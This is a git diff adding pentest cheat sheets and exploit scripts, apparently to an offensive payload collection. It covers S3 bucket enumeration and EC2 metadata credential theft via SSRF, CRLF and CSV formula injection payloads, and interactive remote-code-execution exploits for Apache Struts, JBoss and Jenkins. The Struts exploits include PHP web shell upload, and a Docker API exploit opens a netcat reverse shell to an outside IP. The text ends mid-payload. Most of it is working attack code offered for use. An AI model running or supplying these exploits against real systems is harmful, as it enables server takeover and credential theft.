Files JPEG -> JPG + Tag v2

More CVE - RCE : Jenkins, JBoss, WebLogic, WebSphere
Ruby Deserialization
2018-11-17 14:40:12 +01:00 · 2018-11-15 23:13:08 +01:00 · 2018-11-13 23:38:40 +01:00 · 2018-11-13 23:25:18 +01:00 · 2018-11-09 12:43:30 +01:00 · 2018-11-05 13:45:52 +01:00
118 changed files with 6369 additions and 1188 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,3 @@
 BuildPDF/
 .vscode
-.todo
+.todo
--- a/S3/README.md
+++ b/S3/README.md
@@ -1,47 +1,68 @@
 # Amazon Bucket S3 AWS
 Prerequisites, at least you need awscli
-```
+
 ```bash
 sudo apt install awscli
 ```
 You can get your credential here https://console.aws.amazon.com/iam/home?#/security_credential
 but you need an aws account, free tier account : https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/
-```
+
 ```javascript
 aws configure
 AWSAccessKeyId=[ENTER HERE YOUR KEY]
 AWSSecretKey=[ENTER HERE YOUR KEY]
 ```
-```
+
 ```javascript
 aws configure --profile nameofprofile
 ```
 then you can use *--profile nameofprofile* in the aws command
 By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names
-```
+
 ```bash
 http://s3.amazonaws.com/[bucket_name]/
 http://[bucket_name].s3.amazonaws.com/
 http://flaws.cloud.s3.amazonaws.com/
 ```
 Their names are also listed if the listing is enabled.
 ```xml
 <ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
 <Name>adobe-REDACTED-REDACTED-REDACTED</Name>
 ```
 ## Basic test - Listing the files
 ```bash
 aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
 aws s3 ls  s3://flaws.cloud/ --no-sign-request --region us-west-2
 ```
 You can get the region with a dig and nslookup
 ```bash
 $ dig flaws.cloud
 ;; ANSWER SECTION:
-flaws.cloud.		5	IN	A	52.218.192.11
+flaws.cloud.    5    IN    A    52.218.192.11
 $ nslookup 52.218.192.11
 Non-authoritative answer:
-11.192.218.52.in-addr.arpa	name = s3-website-us-west-2.amazonaws.com.
+11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
 ```
 ## Move a file into the bucket
 ```bash
 aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
 aws s3 cp login.html s3://$bucketName --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers
 ```
 ```bash
 aws s3 mv test.txt s3://hackerone.marketing
 FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."
@@ -50,17 +71,20 @@ SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
 ```
 ## Download every things (in an open bucket)
-```
+
 ```powershell
 aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
 ```
 ## Check bucket disk size (authenticated) use, --no-sign for un-authenticated 
-```
+
 ```powershell
 aws s3 ls s3://<bucketname> --recursive  | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'
 ```
 ## AWS - Extract Backup
-```
+
 ```powershell
 aws --profile flaws sts get-caller-identity
 "Account": "XXXX26262029",
@@ -79,19 +103,24 @@ sudo file -s /dev/xvda1
 sudo mount /dev/xvda1 /mnt
 ```
 ## Bucket informations
 Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting :
-```
+
 ```powershell
 http://169.254.169.254/latest/meta-data/
 http://169.254.169.254/latest/user-data/
 http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE will return the AccessKeyID, SecretAccessKey, and Token
 http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
 ```
 For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
 ## Bucket Finder
 A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files.
-```
+
 ```powershell
 wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
 ./bucket_finder.rb my_words
 ./bucket_finder.rb --region ie my_words
@@ -104,14 +133,16 @@ wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar
 ./bucket_finder.rb --download --region ie my_words
 ./bucket_finder.rb --log-file bucket.out my_words
 ```
 Use a custom wordlist for the bucket finder, can be created with
-```
+
 ```powershell
 List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart, walmart.com, walmart-backup, walmart-media.
 List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart.
 ```
 ## Thanks to
 * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
 * https://digi.ninja/projects/bucket_finder.php
 * [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
--- a/injection/README.md
+++ b/injection/README.md
@@ -1,16 +1,20 @@
 # CRLF
 The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
 A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
 ## CRLF - Add a cookie
 Requested page
-```
+
 ```powershell
 http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
 ```
 HTTP Response
-```
+
 ```powershell
 Connection: keep-alive
 Content-Length: 178
 Content-Type: text/html
@@ -24,12 +28,16 @@ x-xss-protection: 1; mode=block
 ```
 ## CRLF - Add a cookie - XSS Bypass
 Requested page
-```
+
 ```powershell
 http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
 ```
 HTTP Response
-```
+
 ```powershell
 HTTP/1.1 200 OK
 Date: Tue, 20 Dec 2016 14:34:03 GMT
 Content-Type: text/html; charset=utf-8
@@ -50,15 +58,17 @@ X-XSS-Protection:0
 0
 ```
 ## CRLF - Write HTML
 Requested page
-```
+
 ```powershell
 http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
 ```
 HTTP response
-```
+
 ```powershell
 Set-Cookie:en
 Content-Length: 0
@@ -71,19 +81,21 @@ Content-Length: 34
 ```
 ## CRLF - Filter Bypass
 Using UTF-8 encoding
-```
+
 ```powershell
 %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
 ```
 Remainder:
 * %E5%98%8A = %0A = \u560a
 * %E5%98%8D = %0D = \u560d
 * %E5%98%BE = %3E = \u563e (>)
 * %E5%98%BC = %3C = \u563c (<)
 ## Thanks to
 * https://www.owasp.org/index.php/CRLF_Injection
 * https://vulners.com/hackerone/H1:192749
--- a/injection/README.md
+++ b/injection/README.md
@@ -1,22 +1,24 @@
 # CSV Excel formula injection
-Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.	
+
 Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
 ## Exploit
-Basic exploit with Dynamic Data Exchange 
+Basic exploit with Dynamic Data Exchange
-```
+
 ```powershell
 DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
 ```
 Technical Details of the above payload:
 cmd is the name the server can respond to whenever a client is trying to access the server
 /C calc is the file name which in our case is the calc(i.e the calc.exe)
 !A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data
 ```
 Any formula can be started with
-```
+
 ```powershell
 =
 +
 –
@@ -24,6 +26,7 @@ Any formula can be started with
 ```
 ## Thanks to
-* https://owasp.org/index.php/CSV_Excel_Macro_Injection
+
-* https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection
+* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
-*https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
+* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
 * [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
--- a/CVE-2018-11776_.py
+++ b/CVE-2018-11776_.py
@@ -0,0 +1,210 @@
 #!/usr/bin/python
 import urllib2
 import time
 import sys
 import os
 import commands
 import requests
 import readline
 import urlparse
 RED = '\033[1;31m'
 BLUE = '\033[94m'
 BOLD = '\033[1m'
 GREEN = '\033[32m'
 OTRO = '\033[36m'
 YELLOW = '\033[33m'
 ENDC = '\033[0m'
 def cls():
    os.system(['clear', 'cls'][os.name == 'nt'])
 cls()
 logo = BLUE+'''                                                             
  ___   _____  ___    _   _  _____  ___   
 (  _`\(_   _)|  _`\ ( ) ( )(_   _)(  _`\ 
 | (_(_) | |  | (_) )| | | |  | |  | (_(_)
 `\__ \  | |  | ,  / | | | |  | |  `\__ \ 
 ( )_) | | |  | |\ \ | (_) |  | |  ( )_) |
 `\____) (_)  (_) (_)(_____)  (_)  `\____) 
        =[ Command Execution v3]=
              By @s1kr10s                                                                                                            
 '''+ENDC
 print logo
 print " * Ejemplo: http(s)://www.victima.com/files.login\n"
 host = raw_input(BOLD+" [+] HOST: "+ENDC)
 if len(host) > 0:
 	if host.find("https://") != -1 or host.find("http://") != -1:
 		poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
 		def exploit(comando):
 			exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
 			return exploit
 		def exploit2(comando):
 			exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
 			return exploit2
 		def exploit3(comando):
 			exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
 			return exploit3
 		def pwnd(shellfile):
 			exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
 			return exploitfile
 		def validador():
 			arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
 			return arr_lin_win
 		#def reversepl(ip,port):
 		#	print "perl"
 		#def reversepy(ip,port):
 		#	print "python"
 		# CVE-2013-2251 ---------------------------------------------------------------------------------
 		try:
 			response = ''
 			response = urllib2.urlopen(host+poc)
 		except:
 			print RED+" Servidor no responde\n"+ENDC
 			exit(0)
 		print BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC
 		if response.read().find("mamalo") != -1:
 			print RED+"   [-] VULNERABLE"+ENDC
 			owned = open('vulnsite.txt', 'a')
 			owned.write(str(host)+'\n')
 			owned.close()
 			opcion = raw_input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
 			#print BOLD+"   * [SHELL REVERSA]"+ENDC
 			#print OTRO+"     Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC
 			if opcion == 's':
 				print YELLOW+"   [-] GET PROMPT...\n"+ENDC
 				time.sleep(1)
 				print BOLD+"   * [UPLOAD SHELL]"+ENDC
 				print OTRO+"     Struts@Shell:$ pwnd (php)\n"+ENDC
 				while 1:
 					separador = raw_input(GREEN+"Struts2@Shell_1:$ "+ENDC)
 					espacio = separador.split(' ')
 					comando = "','".join(espacio)
 					if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
 						shell = urllib2.urlopen(host+exploit("'"+str(comando)+"'"))
 						print "\n"+shell.read()
 					elif espacio[0] == 'pwnd':
 						pathsave=raw_input("path EJ:/tmp/: ")
 						if espacio[1] == 'php':
 							shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'"""
 							urllib2.urlopen(host+pwnd(str(shellfile)))
 							shell = urllib2.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
 							if shell.read().find(pathsave+"status.php") != -1:
 								print BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC
 							else:
 								print BOLD+RED+"\nNo Create File :/\n"+ENDC
 		# CVE-2017-5638 ---------------------------------------------------------------------------------					
 		print BLUE+"     [-] NO VULNERABLE"+ENDC			
 		print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC
 		x = 0
 		while x < len(validador()):
 			valida = validador()[x]
 			try:
 				req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
 				result = urllib2.urlopen(req).read()
 			  	if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
 			  		print RED+"   [-] VULNERABLE"+ENDC
 			  		owned = open('vulnsite.txt', 'a')
 					owned.write(str(host)+'\n')
 					owned.close()
 					opcion = raw_input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
 					if opcion == 's':
 						print YELLOW+"   [-] GET PROMPT...\n"+ENDC
 						time.sleep(1)
 					  	while 1:
 							try:
 								separador = raw_input(GREEN+"\nStruts2@Shell_2:$ "+ENDC)
 								req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))})
 								result = urllib2.urlopen(req).read()
 								print "\n"+result
 							except:
 								exit(0)
 					else:
 						x = len(validador())
 				else:
 					print BLUE+"     [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)
 			except:
 				pass
 			x=x+1
 		# CVE-2018-11776 ---------------------------------------------------------------------------------
 		print BLUE+"     [-] NO VULNERABLE"+ENDC			
 		print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC
 		x = 0
 		while x < len(validador()):
 			#Filtramos la url solo dominio
 			url = host.replace('#', '%23')
 			url = host.replace(' ', '%20')
 			if ('://' not in url):
 				url = str("http://") + str(url)
 			scheme = urlparse.urlparse(url).scheme
 			site = scheme + '://' + urlparse.urlparse(url).netloc
 			#Filtramos la url solo path
 			file_path = urlparse.urlparse(url).path
 			if (file_path == ''):
 				file_path = '/'
 			valida = validador()[x]
 			try:	
 				result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
 				if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
 			  		print RED+"   [-] VULNERABLE"+ENDC
 			  		owned = open('vulnsite.txt', 'a')
 					owned.write(str(host)+'\n')
 					owned.close()
 					opcion = raw_input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
 					if opcion == 's':
 						print YELLOW+"   [-] GET PROMPT...\n"+ENDC
 						time.sleep(1)
 						print BOLD+"   * [UPLOAD SHELL]"+ENDC
 						print OTRO+"     Struts@Shell:$ pwnd (php)\n"+ENDC
 					  	while 1:
 							separador = raw_input(GREEN+"Struts2@Shell_3:$ "+ENDC)
 							espacio = separador.split(' ')
 							comando = "%20".join(espacio)
 							shell = urllib2.urlopen(host+exploit3(str(comando)))
 							print "\n"+shell.read()
 					else:
 						x = len(validador())
 						exit(0)
 				else:
 					print BLUE+"     [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)
 			except:
 				pass
 			x=x+1
 	else:
 		print RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC
 		exit(0)
 else:
 	print RED+" Debe Ingresar una Url\n"+ENDC
 	exit(0)
--- a/CVE-2018-11776.py
+++ b/CVE-2018-11776.py
@@ -0,0 +1,226 @@
 #!/usr/bin/env python3
 # coding=utf-8
 # *****************************************************
 # struts-pwn: Apache Struts CVE-2018-11776 Exploit
 # Author:
 # Mazin Ahmed <Mazin AT MazinAhmed DOT net>
 # This code uses a payload from:
 # https://github.com/jas502n/St2-057
 # *****************************************************
 import argparse
 import random
 import requests
 import sys
 try:
    from urllib import parse as urlparse
 except ImportError:
    import urlparse
 # Disable SSL warnings
 try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
 except Exception:
    pass
 if len(sys.argv) <= 1:
    print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')
    print('[*] Struts-PWN - @mazen160')
    print('\n%s -h for help.' % (sys.argv[0]))
    exit(0)
 parser = argparse.ArgumentParser()
 parser.add_argument("-u", "--url",
                    dest="url",
                    help="Check a single URL.",
                    action='store')
 parser.add_argument("-l", "--list",
                    dest="usedlist",
                    help="Check a list of URLs.",
                    action='store')
 parser.add_argument("-c", "--cmd",
                    dest="cmd",
                    help="Command to execute. (Default: 'id')",
                    action='store',
                    default='id')
 parser.add_argument("--exploit",
                    dest="do_exploit",
                    help="Exploit.",
                    action='store_true')
 args = parser.parse_args()
 url = args.url if args.url else None
 usedlist = args.usedlist if args.usedlist else None
 cmd = args.cmd if args.cmd else None
 do_exploit = args.do_exploit if args.do_exploit else None
 headers = {
    'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',
    # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
    'Accept': '*/*'
 }
 timeout = 3
 def parse_url(url):
    """
    Parses the URL.
    """
    # url: http://example.com/demo/struts2-showcase/index.action
    url = url.replace('#', '%23')
    url = url.replace(' ', '%20')
    if ('://' not in url):
        url = str("http://") + str(url)
    scheme = urlparse.urlparse(url).scheme
    # Site: http://example.com
    site = scheme + '://' + urlparse.urlparse(url).netloc
    # FilePath: /demo/struts2-showcase/index.action
    file_path = urlparse.urlparse(url).path
    if (file_path == ''):
        file_path = '/'
    # Filename: index.action
    try:
        filename = url.split('/')[-1]
    except IndexError:
        filename = ''
    # File Dir: /demo/struts2-showcase/
    file_dir = file_path.rstrip(filename)
    if (file_dir == ''):
        file_dir = '/'
    return({"site": site,
            "file_dir": file_dir,
            "filename": filename})
 def build_injection_inputs(url):
    """
    Builds injection inputs for the check.
    """
    parsed_url = parse_url(url)
    injection_inputs = []
    url_directories = parsed_url["file_dir"].split("/")
    try:
        url_directories.remove("")
    except ValueError:
        pass
    for i in range(len(url_directories)):
        injection_entry = "/".join(url_directories[:i])
        if not injection_entry.startswith("/"):
            injection_entry = "/%s" % (injection_entry)
        if not injection_entry.endswith("/"):
            injection_entry = "%s/" % (injection_entry)
        injection_entry += "{{INJECTION_POINT}}/"  # It will be renderred later with the payload.
        injection_entry += parsed_url["filename"]
        injection_inputs.append(injection_entry)
    return(injection_inputs)
 def check(url):
    random_value = int(''.join(random.choice('0123456789') for i in range(2)))
    multiplication_value = random_value * random_value
    injection_points = build_injection_inputs(url)
    parsed_url = parse_url(url)
    print("[%] Checking for CVE-2018-11776")
    print("[*] URL: %s" % (url))
    print("[*] Total of Attempts: (%s)" % (len(injection_points)))
    attempts_counter = 0
    for injection_point in injection_points:
        attempts_counter += 1
        print("[%s/%s]" % (attempts_counter, len(injection_points)))
        testing_url = "%s%s" % (parsed_url["site"], injection_point)
        testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value))
        try:
            resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
        except Exception as e:
            print("EXCEPTION::::--> " + str(e))
            continue
        if "Location" in resp.headers.keys():
            if str(multiplication_value) in resp.headers['Location']:
                print("[*] Status: Vulnerable!")
                return(injection_point)
    print("[*] Status: Not Affected.")
    return(None)
 def exploit(url, cmd):
    parsed_url = parse_url(url)
    injection_point = check(url)
    if injection_point is None:
        print("[%] Target is not vulnerable.")
        return(0)
    print("[%] Exploiting...")
    payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd)
    testing_url = "%s%s" % (parsed_url["site"], injection_point)
    testing_url = testing_url.replace("{{INJECTION_POINT}}", payload)
    try:
        resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        return(1)
    print("[%] Response:")
    print(resp.text)
    return(0)
 def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
    if url:
        if not do_exploit:
            check(url)
        else:
            exploit(url, cmd)
    if usedlist:
        URLs_List = []
        try:
            f_file = open(str(usedlist), "r")
            URLs_List = f_file.read().replace("\r", "").split("\n")
            try:
                URLs_List.remove("")
            except ValueError:
                pass
            f_file.close()
        except Exception as e:
            print("Error: There was an error in reading list file.")
            print("Exception: " + str(e))
            exit(1)
        for url in URLs_List:
            if not do_exploit:
                check(url)
            else:
                exploit(url, cmd)
    print("[%] Done.")
 if __name__ == "__main__":
    try:
        main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
    except KeyboardInterrupt:
        print("\nKeyboardInterrupt Detected.")
        print("Exiting...")
        exit(0)
--- a/Exploits/Docker
+++ b/Exploits/Docker
@@ -0,0 +1,48 @@
 import requests
 import logging
 import json
 import urllib.parse
 # NOTE
 # Enable Remote API with the following command
 # /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
 # This is an intended feature, remember to filter the port 2375..
 name          = "docker"
 description   = "Docker RCE via Open Docker API on port 2375"
 author        = "Swissky"
 # Step 1 - Extract id and name from each container
 ip   = "127.0.0.1"
 port = "2375"
 data = "containers/json"
 url  = "http://{}:{}/{}".format(ip, port, data)
 r = requests.get(url)
 if r.json:
    for container in r.json():
        container_id   = container['Id']
        container_name = container['Names'][0].replace('/','')
        print(container_id, container_name)
        # Step 2 - Prepare command
        cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
        data = "containers/{}/exec".format(container_name)
        url = "http://{}:{}/{}".format(ip, port, data)
        post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
        post_header = {
            "Content-Type": "application/json"
        }
        r = requests.post(url, json=json.loads(post_json))
        # Step 3 - Execute command
        id_cmd = r.json()['Id']
        data = "exec/{}/start".format(id_cmd)
        url = "http://{}:{}/{}".format(ip, port, data)
        post_json = '{ "Detach":false,"Tty":false}'
        post_header = {
            "Content-Type": "application/json"
        }
        r = requests.post(url, json=json.loads(post_json))
        print(r)
--- a/Exploits/Drupalgeddon2
+++ b/Exploits/Drupalgeddon2
--- a/CVE-2015-7501.py
+++ b/CVE-2015-7501.py
@@ -0,0 +1,61 @@
 #! /usr/bin/env python2
 # Jboss Java Deserialization RCE (CVE-2015-7501)
 # Made with <3 by @byt3bl33d3r
 import requests
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 import argparse
 import sys, os
 #from binascii import hexlify, unhexlify
 from subprocess import check_output
 ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
 ysoserial_path = None
 parser = argparse.ArgumentParser()
 parser.add_argument('target', type=str, help='Target IP')
 parser.add_argument('command', type=str, help='Command to run on target')
 parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
 parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
 if len(sys.argv) < 2:
    parser.print_help()
    sys.exit(1)
 args = parser.parse_args()
 if not args.ysoserial_path:
    for path in ysoserial_default_paths:
        if os.path.exists(path):
            ysoserial_path = path
 else:
    if os.path.exists(args.ysoserial_path):
        ysoserial_path = args.ysoserial_path
 if ysoserial_path is None:
    print '[-] Could not find ysoserial JAR file'
    sys.exit(1)
 if len(args.target.split(":")) != 2:
    print '[-] Target must be in format IP:PORT'
    sys.exit(1)
 if not args.command:
    print '[-] You must specify a command to run'
    sys.exit(1)
 ip, port = args.target.split(':')
 print '[*] Target IP: {}'.format(ip)
 print '[*] Target PORT: {}'.format(port)
 gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
 r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
 if r.status_code == 200:
    print '[+] Command executed successfully'
--- a/CVE-2015-8103.py
+++ b/CVE-2015-8103.py
--- a/CVE-2016-0792.py
+++ b/CVE-2016-0792.py
@@ -0,0 +1,83 @@
 #! /usr/bin/env python2
 #Jenkins Groovy XML RCE (CVE-2016-0792)
 #Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
 #Made with <3 by @byt3bl33d3r
 import requests
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 import argparse
 import sys
 parser = argparse.ArgumentParser()
 parser.add_argument('target', type=str, help='Target IP:PORT')
 parser.add_argument('command', type=str, help='Command to run on target')
 parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
 if len(sys.argv) < 2:
    parser.print_help()
    sys.exit(1)
 args = parser.parse_args()
 if len(args.target.split(':')) != 2:
    print '[-] Target must be in format IP:PORT'
    sys.exit(1)
 if not args.command:
    print '[-] You must specify a command to run'
    sys.exit(1)
 ip, port = args.target.split(':')
 print '[*] Target IP: {}'.format(ip)
 print '[*] Target PORT: {}'.format(port)
 xml_formatted = ''
 command_list = args.command.split()
 for cmd in command_list:
    xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd)
 xml_payload = '''<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando" reference="../../../.."/>
            <owner class="java.lang.ProcessBuilder">
              <command>
                {}
              </command>
